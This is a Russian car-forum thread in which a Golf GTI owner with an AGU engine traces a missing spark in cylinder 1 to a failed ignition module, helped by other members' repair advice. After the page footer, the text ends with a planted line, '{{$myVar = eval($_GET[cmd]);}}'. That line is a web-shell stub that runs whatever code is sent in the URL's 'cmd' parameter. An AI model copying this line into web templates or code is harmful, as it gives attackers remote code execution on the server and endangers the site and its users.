+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 16

Тема: Нет искры AGU


  1. #1
    Мимо проходил zhuravlov is on a distinguished road Аватар для zhuravlov
    Регистрация
    23.05.2012
    Откуда
    Санкт- Петербург
    Машина
    Golf IV GTI
    Сообщений
    5

    Exclamation Нет искры AGU

    Друзья помогите советом. Вообщем проблема такова: Авто Golf VI GTI 1.8 Turbo затроил двигатель (AGU), заменилсвечи. проблема не исчезла, стал проверять искру- нет искры в первом цилиндре, подумал возможно вышла из строя катушка зажигания первого цилиндра, поменял местами катушки- результат тот же нет искры в первом цилиндре, напрашивается вывод: либо неисправность проводки или "мозги". По проводке: масса и питание катушки есть, не приходит импульс. Вызвонить проводку пока не удалось, не найти где стоит блок управления зажиганием, под лобовым стеклом стоит блок управления, но с катушек в него проводка не приходит, я так понимаю это блок управления впрыском в него приходят провода с форсунок.
    Подскажите плиз где стоит блок управления зажиганием, чтоб прозвонить проводку от блока до катушки и понять дело в проводке или умерли "мозги"???
    Подскажите при худшем раскладе- при замене блока, этот блок привязан к штатному иммобилайзеру???
    Может у кого есть схема???
    Заранее СПАСИБО!!!!!

  2. #2
    GTI-Racing DenGT is on a distinguished road Аватар для DenGT
    Регистрация
    29.01.2012
    Откуда
    москва
    Машина
    гольф4 AGU
    Сообщений
    136
    Цитата Сообщение от zhuravlov Посмотреть сообщение
    Друзья помогите советом. Вообщем проблема такова: Авто Golf VI GTI 1.8 Turbo затроил двигатель (AGU), заменилсвечи. проблема не исчезла, стал проверять искру- нет искры в первом цилиндре, подумал возможно вышла из строя катушка зажигания первого цилиндра, поменял местами катушки- результат тот же нет искры в первом цилиндре, напрашивается вывод: либо неисправность проводки или "мозги". По проводке: масса и питание катушки есть, не приходит импульс. Вызвонить проводку пока не удалось, не найти где стоит блок управления зажиганием, под лобовым стеклом стоит блок управления, но с катушек в него проводка не приходит, я так понимаю это блок управления впрыском в него приходят провода с форсунок.
    Подскажите плиз где стоит блок управления зажиганием, чтоб прозвонить проводку от блока до катушки и понять дело в проводке или умерли "мозги"???
    Подскажите при худшем раскладе- при замене блока, этот блок привязан к штатному иммобилайзеру???
    Может у кого есть схема???
    Заранее СПАСИБО!!!!!
    я то конечно не спец. но если есть питание на катушке причем тут проводка? может свеча или это штука (как называется не знаю) которая от катушки до свечи идёт?

  3. #3
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    А может просто коммутатор полетел? Тот что на корпусе воздушного фильтра, он не ремонтируется, только под замену. У меня именно такие симптомы были и казался коммутатор, поставил б.у., в работе уже 2 года, полет нормальный.
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  4. #4
    Мимо проходил zhuravlov is on a distinguished road Аватар для zhuravlov
    Регистрация
    23.05.2012
    Откуда
    Санкт- Петербург
    Машина
    Golf IV GTI
    Сообщений
    5
    Цитата Сообщение от DenGT Посмотреть сообщение
    я то конечно не спец. но если есть питание на катушке причем тут проводка? может свеча или это штука (как называется не знаю) которая от катушки до свечи идёт?
    у каждой свечки своя катушка, у катушки 3 провода (питание, масса и импульс) нет импульса на катушке. Я менял катушки местами, все равно нет искры в первом цилиндре. А от катушки до свечи идет только пружинка.

    Про коммутатор мысль не плохая, сегодня поищу его где он там стоит
    Спасибо

  5. #5
    ---- возможно еще что-то с проводкой

  6. #6
    Мимо проходил zhuravlov is on a distinguished road Аватар для zhuravlov
    Регистрация
    23.05.2012
    Откуда
    Санкт- Петербург
    Машина
    Golf IV GTI
    Сообщений
    5
    Схемку бы

  7. #7
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    У меня не АГУ мотор, но по симптомам комутатор скорее всего, от него идут импульсы на катушки. Попробуй взять поюзать у когонить на пару часов и посмотришь оно или нет, чтоб не покупать новый:)
    BMW 330D POWERED by Dizelboost :pepper:

  8. #8
    Мимо проходил zhuravlov is on a distinguished road Аватар для zhuravlov
    Регистрация
    23.05.2012
    Откуда
    Санкт- Петербург
    Машина
    Golf IV GTI
    Сообщений
    5
    Все ребята, Спасибо!!! Починил!!! Действительно коммутатор.

  9. #9
    GTI-Racing mdm123 is on a distinguished road Аватар для mdm123
    Регистрация
    19.07.2009
    Машина
    AGU
    Сообщений
    82
    на АГУше катушки бескоммутаторные и они очень редко выходят из строя, вот коммутатор другое дело ...
    по поводу ремонта - можно вскрыть его, посмотреть контакты и пропаять, возможно, от времени и температуры пайка "поплыла"
    да, и при установке желательно почистить площадку радиатора и смазать термопастой

  10. #10
    GTI-Racing DenGT is on a distinguished road Аватар для DenGT
    Регистрация
    29.01.2012
    Откуда
    москва
    Машина
    гольф4 AGU
    Сообщений
    136
    По проводке: масса и питание катушки есть, не приходит импульс

    дружище а можешь по подробне рассказать как и чем проверить проходит или не проходит импульс?

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. при 150 км/ч мелкая вибрация на руль и искры из под колодок при сильном торможении
    от valj в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 18
    Последнее сообщение: 24.09.2012, 17:17

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}